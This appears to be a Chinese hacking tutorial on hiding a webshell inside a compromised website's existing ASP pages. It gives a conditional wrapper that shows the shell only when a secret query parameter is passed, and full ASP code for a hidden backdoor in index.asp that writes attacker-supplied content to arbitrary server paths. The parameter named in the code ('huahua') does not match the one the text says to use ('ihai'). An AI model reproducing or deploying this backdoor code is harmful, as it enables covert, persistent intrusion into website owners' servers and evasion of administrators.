得到网站的webshell后,如果被管理员发现,那么你的马就没用了 ,被删了! 所以我们要隐藏好我们的SHELL 下面教一种很菜的方法,ASP插入法,不容易被发现~ 在我们要做手脚的ASP文件里加入如下内容 <% if request("action")="shell" then %> **************************** <% end if %> 在***********处加入你的shell代码 就哦克了 访问的时候在你做了手脚的ASP文件后面加上?action=shell(例如:index.asp?action=shell) 就可以调出webshell了,不影响正常浏揽。 ================================ 我们在index.asp隐藏自己的asp木马 把Newmm代码加到index.asp中 <% if request("huahua")="52" then %> <% dim objFSO %> <% dim fdata %> <% dim objCountFile %> <% on error resume next %> <% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %> <% if Trim(request("syfdpath"))<>"" then %> <% fdata = request("cyfddata") %> <% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %> <% objCountFile.Write fdata %> <% if err =0 then %> <% response.write "save Success!" %> <% else %> <% response.write "Save UnSuccess!" %> <% end if %> <% err.clear %> <% end if %> <% objCountFile.Close %> <% Set objCountFile=Nothing %> <% Set objFSO = Nothing %> <% Response.write "
" %> <% Response.write "保存文件的绝对路径(包括文件名:如D:\web\x.asp):" %> <% Response.Write "" %> <% Response.Write "
" %> <% Response.write "本文件绝对路径" %> <% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %> <% Response.write "
" %> <% Response.write "输入马的内容:" %> <% Response.write "" %> <% Response.write "" %> <% Response.write "
" %> <% end if %> 然后我们打开http://qq/index.asp 一切正常,没什么反映 在http://qq/index.asp后面加?ihai=52 http://qq/index.asp?ihai=52 看到我们马儿没 这个后门比较隐秘吧,总比我们一个有着自己名字的后门好吧